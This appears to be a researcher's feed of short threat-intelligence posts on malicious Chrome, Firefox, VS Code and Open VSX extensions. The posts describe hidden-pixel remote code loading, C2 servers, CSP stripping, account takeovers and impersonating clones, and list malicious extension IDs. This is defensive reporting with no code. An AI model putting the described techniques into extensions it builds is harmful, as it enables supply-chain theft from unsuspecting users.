We tracked this one from the moment it was listed for sale Oct 11th, through the ownership change, to the malicious update Feb 17th. Full technical breakdown of the pixel trick, the C2 infrastructure, and the CSP stripping.
annex.security/blog/pixel-p...
The original extension still works perfectly. Google Lens integration, screen capture, all of it. Users would never notice anything beyond a single permission acceptance prompt. That's what makes extension supply chain attacks so dangerous.
The new owner added a C2 server, stripped important security headers from all pages, and used a 1x1 invisible pixel's onload handler to execute remote JavaScript in pages. The actual malicious code never appears in the extension's source files, but the code update was worrying
A Chrome extension with 7,000 users and a Google Featured badge was recently sold, weaponized, and pushed a malicious update to that executed code through a hidden pixel. Here's how it worked 👇
LimaCharlie released their Agentic SecOps Workspace recently which runs Claude Code in their UI including MCP servers. It's never been so easy to just say 'look at my detections and research the extensions'. Even though 1Password falls under an unapproved policy, at least it isn't malicious!
What a mess and this isn't the first time this has happened!
oorzc.mind-map@1.0.61
oorzc.i18n-tools-plus@1.6.8
oorzc.ssh-tools@0.5.1 (removed)
oorzc.scss-to-css-compile@1.3.4
It is these incremental compromises that will become a widespread incident.
1. Your extension will auto update
2. The malicious versions will be removed from Open VSX so no trace
3. Your extension will not downgrade itself
4. Victims will have to wait until the real developer publishes a new version to update
5. If the extensions are removed, they won't uninstall
As predicted - "oorzc" a developer with extensions totalling 25,000 legitimate installs across 4 extensions looks to have had their Open VSX account compromised and published malicious updates. The worst part is this...
The next supply chain worm has been seeded in Open VSX. A cloned Angular extension with 5000 downloads has been available for two weeks and was updated with malware 6 days ago. This multi stage attack uses etherhiding, gcal c2, rust implants, and more.
annex.security/blog/worms-l...
Obsidian Security identifies a set of 25 extensions impersonating popular AI providers affecting over 500,000 real users by stealing API keys, prompt poaching, and capturing search queries. It's the wild west in the extension store!
www.obsidiansecurity.com/blog/small-t...
If you've had to listen to me over the last couple months, it's likely you would've hear me say that all of our most important apps will have extensions or plugins for integration. Think we're learning from past mistakes?
A browser extension, PasteReady, was listed for sale last May became malicious after an ownership transfer on December 27th. Many organizations have been impacted by extensions which changed hands. @secureannex.com watches for transfers and warns you in advance!
www.linkedin.com/pulse/paster...
Pyrefly - Python Language Tooling by Meta is the 4th most used extension in Open VSX. Be careful downloading the 'Pro' version in Cursor hoping you'll get some extra features, it is published by 'casendsabotnu954' who just joined GitHub the other day. Textbook cloning and staging behavior!
Loving a new detection that identifies code extensions published by new and lightly used GitHub accounts.This time it instantly caught an extension impersonating JFrog which already has over 10k downloads.
Not the "pulling a Rabbit out of a hat" magic trick that most want. This Firefox extension completely changes from a "Simple Label Editor" to a Rabby wallet stealer overnight.
A browser extension with over a million users is poaching the prompts of leading AI chat tools.
SimilarWeb loads obfuscated remote configuration to collect the prompts, responses and metadata of your conversations. Your private thoughts are analytics companies gain.
secureannex.com/blog/prompt-...
These code comments are an improvement from:
1. Request malware
2. Download malware
3. Make malware executable
4. Run malware
This is the extent of the extension available in the VS Marketplace. Installs a Mythic agent from the C2.
Monitoring a large influx of AI slop extensions that are reposting a marginally refactored but known malicious package. The marketplace listings are packed with emojis and a couple sections of 'features'. This one made the mistake of linking to an already known piece of malware.
Welcome to Antigravity the newest most advanced agentic AI development tool by Google...
... uses Open VSX for extensions and shows malicious listings to users.
Changing how an extension looks in a marketplace doesn't require new code to be pushed. Check out the magic when this "Test Extension" magically turns into a "solidity" extension after being published. Review the full lineage of a marketplace listing using the new date picker in Secure Annex.
Vibed coded malicious extensions are getting out of hand!
This 'theme' downloads a malicious zip, unpacks it, and runs it silently with PowerShell.
16 Firefox extensions with the almost the same name, same permhash requesting the most sensitive permission combinations like <all_urls> and cookies. Something being staged?
Glassworm returned in a big way during the holiday. We're tracking 23 code extensions across the VS Marketplace and Open VSX which copy popular extensions, evade filters, manipulate their download counts, and then update with sinister malware.
secureannex.com/blog/glasswo...
Resembles Glassworm signatures loading a rust binary. Some of the activation code is tucked into copied extensions, but still runs on activate.
Malware in Open VSX and available in Cursor right now
tailwind-nuxt.tailwindcss-for-react
flutcode.flutter-extension
yamlcode.yaml-vscode-extension
vims-vsce.vscode-vim
yamlcode.yaml-vscode-extension
solblanco.svetle-vsce
Open VSX:
saoudrizvsce.claude-dev
saoudrizvsce.claude-devsce
vitalik.solidity
3/3
prisma-inc.prisma-studio-assistance
prettier-vsc.vsce-prettier
flutcode.flutter-extension
csvmech.csvrainbow
codevsce.codelddb-vscode
saoudrizvsce.claude-devsce
clangdcode.clangd-vsce
cweijamysq.sync-settings-vscode
bphpburnsus.iconesvscode
klustfix.kluster-code-verify
2/3
Unprecedented code extension attacks this week. All are name squatting on popular tools. Only a couple have had malware deployed, many are still staging, few have been removed from marketplaces. There may be more coming.
VS Marketplace:
iconkieftwo.icon-theme-materiall
1/3
Imagine how useful it would be if the Chrome Web Store showed you users over time. This ad blocker went from 0 to 40,000 users overnight! 🤔
